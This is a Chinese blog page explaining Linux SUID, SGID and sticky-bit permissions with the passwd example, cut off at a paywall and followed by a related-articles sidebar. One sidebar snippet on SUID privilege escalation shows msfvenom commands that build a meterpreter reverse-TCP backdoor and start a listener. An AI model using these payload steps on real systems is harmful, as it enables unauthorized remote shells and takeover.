详解Linux中文件的特殊权限:SGID、SUID、SBIT

最新推荐文章于 2024-04-25 11:10:04 发布
VIP文章 最新推荐文章于 2024-04-25 11:10:04 发布
阅读量1.8k 收藏 4
点赞数
分类专栏: Linux命令 文章标签: linux SBIT SGID SUID
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_14982047/article/details/50739475
版权

Set UID(SUID)

什么是SUID?

  当s这个标志出现在文件所有者owner的权限x上时,例如/usr/bin/passwd的权限状态是”-rwsr-xr-x”,这样的形式就被称为SetUID。

SUID的有什么样的限制和功能呢?

  我们首先将SUID拥有的限制和功能列出来,然后再通过一个具体的例子进行解释:

  1. 首先,SUID仅对二进制程序有效;
  2. 执行者要对该程序具有x权限;
  3. 这个权限是在程序的执行过程中发挥作用的;
  4. 执行者将暂时拥有程序owner的权限。

  接下来我们通过一个具体的例子来加深对上面的限制和概念的理解。在Linux系统中,所有的帐号密码都记录在/etc/shadow文件中,这个文件的权限是”r- - - - - - - - 1 root root”(其中1表示i node节点的数目),意思就是只有root可对读这个文件而且可以对这个文件进行强制写入。但是普通用户也是可以通过passwd命令修改自己的密码的。你可能会觉得奇怪,明明其他用户是没有权限访问/etc/shadow这个文件的,为什么密码可以被修改呢?这就是SUID的功能啦。例如,我的当前用户是flyonthemap(在地图上飞行),对应上面的功能和限制的解释则有:

  1. usr/bin/passwd的权限状态是“-rwsr-xr-x”,因此flyonthemap对有x的权限,也就是说可以执行passwd命令。
  2. passwd的拥有者
最低0.47元/天 解锁文章
在地图上飞行
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
rbac的权限模式是什么
04-21
rbac的权限UML模型设置与一些基础链接
关于UNIX和Linux系统下SUIDSGID的解析
ckomuo086028的博客
05-15 1138
如果你对SUIDSGID仍有迷惑可以好好参考一下! Copyright by kevintz. [@more@]由于用户在UNIX下经常会遇到SUIDSGID的概念,而且SUIDSGID涉及到系统安全,所以用户也比较关...
Linux权限suid”与“guid”设置
君子不怨天的博客
06-03 3456
什么是suid和guid suid: 这是一种特殊权限,设置了suid的脚本文件,在其他用户执行该脚本时,此用户的权限是该脚本文件属主的权限。 guid: 设置了guid的脚本文件,执行此脚本文件的用户将具有该文件所属用户组用户的权限。 例如:一个root用户的某一个脚本设置了这样的权限,那么其他用户普通用户在执行该脚本期间也同样具有root用户的权限suid与guid的作用 设置这样文件权限的作用就是方便其他用户执行脚本,而不一定需要文件的属主用户来执行 设置suid与guid 如果想要设置su
Linux特殊权限SUIDSGID与SBIT的深入讲解
09-15
linux文件权限管理简直是让人叹为观止,所以这篇文章主要给大家介绍了关于Linux特殊权限SUIDSGID与SBIT的相关资料,文通过示例代码介绍的非常详细,需要的朋友可以参考借鉴,下面随着小编来一起学习学习吧
Linux特殊文件权限SUID, GUID and Sticky Bit(s权限,t权限
克克克克业业的学习记录
01-11 1403
Linux特殊文件权限权限设置常用权限其他权限(s权限,t权限SUID位GUID位Sticky bit 权限设置 常用权限 linux系统内有三种身份:u拥有者,g群组,o其他人 有三种常用权限:r读权限,w写权限,x执行权限 r:读权限,用户可以读取文档的内容,如用cat,more查看 w:写权限,用户可以编辑文档 x:该目录具有可以被系统执行的权限 其他权限(s权限,t权限SUID位 s权限: 设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份. 典型的文件是passwd.
LINUXsuidsgid、sticky特殊权限位的含义和作用
不积跬步无以至千里
06-28 2944
待完善
深入剖析SUIDSGID权限Linux的安全要点
赚钱养家
07-10 1319
SUIDSGIDLinux操作系统的两种特殊权限,它们可以使普通用户执行某些命令时具有root用户的权限。本文将深入剖析SUIDSGID权限,包括它们的作用、如何设置和如何防止恶意使用,以及它们在Linux的安全要点。
linuxsuidsgid作用,linuxSUIDSGID与SBIT的奇妙用途详解
weixin_39629876的博客
05-13 342
前言linux文件权限管理简直是让人叹为观止,又回顾了一下SUIDSGID和SBIT的作用,总结一下。其实SUIDSGID的作用跟sudo是相似的。当用户A想执行一个原本属于用户B的可执行文件时,若B的文件设置了suid位,则A在执行时是以用户 B的身份来执行。SUID是Set UID的简称,翻译过来是设置用户ID,感觉很别扭,还是觉得SUID最为简炼。它会出现在文件拥有者权限的执行位上,...
Linux文件系统上的特殊权限
mengmeng_921的博客
12-08 1568
Linux文件权限,远不止 rwx 那么简单,还有一些特殊权限是用来打破限制和默认的安全上下文规则的,除了之前介绍过的隐藏属性,还有几个显式的特殊权限。下面就来说说 Linux 文件系统上的 SUIDSGID 和 Sticky 权限Linux文件系统上的特殊权限
搭建Ubuntu的51单片机开发环境(学习记录)
m0_65029021的博客
12-20 2467
1.首先下载sdcc编译器,可以理解为gcc/g++编译器。 sudo apt-get install sdcc sudo apt-get install libvte-dev 2.下载stcgal-STC MCU ISP闪存工具。 pip3 install stcgal 如果没有pip3指令: sudo apt install python3-pip 安装完成。 3.准备好代码文件,编译前我们需要做一些修改,这和在windows上编译不同。 比如在window...
linux基础教程之特殊权限SUIDSGID和SBIT
09-15
主要给大家介绍了关于linux基础教程之特殊权限SUIDSGID和SBIT的相关资料,文通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
linuxSUIDSGID与SBIT的奇妙用途详解
01-20
linux文件权限管理简直是让人叹为观止,又回顾了一下SUIDSGID和SBIT的作用,总结一下。 其实SUIDSGID的作用跟sudo是相似的。当用户A想执行一个原本属于用户B的可执行文件时,若B的文件设置了suid位,则A在...
linux特殊权限suidsgid、sbit
m0_71163619的博客
06-05 1066
特殊权限suidsgid、sbit
Linux命令find查询suidsgid
weixin_30276935的博客
07-05 1094
“+”和“-”其实一个是逻辑与一个是逻辑或得意思 [root@localhost ~]# find / -perm +4000 -exec ls -ld {} \; -rwsr-xr-x 1 root root 0 07-05 01:36 /root/file -rwsr-xr-x 1 root root 71160 2009-12-16 /sbin/umount.nfs4 -rws...
提权_Linux提权_suid
草木
12-08 2413
1.MSF连接目标机 生成msf后门,上传到目标机,开启监听,等待运行。 >msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=6666 -i 3 -f elf -o shell //生成后门 >set payload linux/x64/meterpreter/reverse_tcp >set lhost 0.0.0.0 >set lport 6666 >exploit 2
linuxsuidsgid作用,LinuxSUIDSGID详解
weixin_27531501的博客
05-13 1156
如果你对SUIDSGID仍有迷惑可以好好参考一下!由 于用户在UNIX下经常会遇到SUIDSGID的概念,而且SUIDSGID涉及到系统安全,所以用户也比较关心这个问题。关于SUIDSGID的 问题也经常有人提问,但回答的人一般答得不够详细,加上曾经回答过两个网友的问题,还查了一些资料,决定整理成本文,以供大家参考。限于本人的水平问题, 文章如果有不当之处,请广大网友指正。一、UNIX下...
Linux 特殊文件权限
D的博客
08-07 1570
一般情况下我们看到的文件权限例如 755[ root@node01 demo ] # mkdir user1 [ root@node01 demo ] # touch aaa [ root@node01 demo ] # ll 总用量 0 -rw-r--r-- 1 root root 0 8 月 7 13 :09 aaadrwxr-xr-x 2 root root 6 8 月 7 13 :08 user1rwx 当前用户权限r-x 当前组的权限r-x 其他用户权限。...............
linux11 ~文件权限
weixin_45070552的博客
09-28 304
SUID SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。 查看passwd命令属性时发现所有者的权限由rwx变成了rws,其x改变成s就意味着该文件被赋予了SUID权限。另外有读者会好奇,那么如果原本的权限是rw-呢?如果原先权限位上没有x执行权限,那么被赋予特殊权限后将变成大写的S。 SGID SGID主要实现如...
Elasticsearch单机部署(Linux
明静致远
04-22 902
本文Elasticsearch版本为7.12.0,JDK版本为1.8.0,Linux环境部署。(1)查看Elasticsearch对应的常用的jdk版本如下:(详情可看官网的JDK部署(Linux)
Linux 抽象命名空间(Abstract Namespace)简介
最新发布
日拱一卒,玉汝于成
04-25 354
与传统的 UDS 不同,抽象命名空间并不在文件系统创建实际文件,而是仅存在于内核内存,其名称以 localabstract: 作为前缀。在这个例子,我们创建了一个名为 my_abstract_namespace 的抽象命名空间,并将其绑定到了刚创建的 Unix 套接字上。要在 Linux 系统生成一个抽象命名空间,通常需要使用编程语言的套接字 API 来创建一个 Unix 域套接字,并将其绑定到一个以 localabstract: 开头的特殊路径。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值